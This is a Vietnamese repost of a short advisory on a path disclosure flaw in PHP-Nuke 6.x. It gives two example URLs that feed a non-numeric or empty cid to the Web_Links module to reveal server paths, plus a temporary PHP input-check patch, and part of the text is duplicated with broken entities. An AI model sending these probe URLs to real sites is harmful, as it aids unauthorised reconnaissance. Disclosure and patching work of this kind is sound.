PhpNuke - Path Disclosure

Thông tin tài liệu

PhpNuke - Path Disclosuretrang này đã được đọc lần Lỗi Path Disclosure ở PHP-Nuke 6.x, và những version khác? Khai thác: +http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words] +http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink Nếu [any_words] có một giá trị không thuộc số hay là một giá trị NULL, thì nó sẽ đưa ra "path disclosure". Patch(đây là temporal patch, nhưng . vẫn tốt) Trong hàm viewlink chèn thêm code sau: if(!isset($cid) || $cid == NULL || $cid == "" || !is_numeric ($cid)) { echo "I don't like you >:|"; exit(); } . PhpNuke - Path Disclosuretrang này đã được đọc lần Lỗi Path Disclosure ở PHP-Nuke 6.x, và những version khác? Khai. một giá trị không thuộc số hay là một giá trị NULL, thì nó sẽ đưa ra " ;path disclosure& quot;. Patch(đây là temporal patch, nhưng... vẫn tốt) Trong hàm

Ngày đăng: 02/11/2012, 14:19

Xem thêm: PhpNuke - Path Disclosure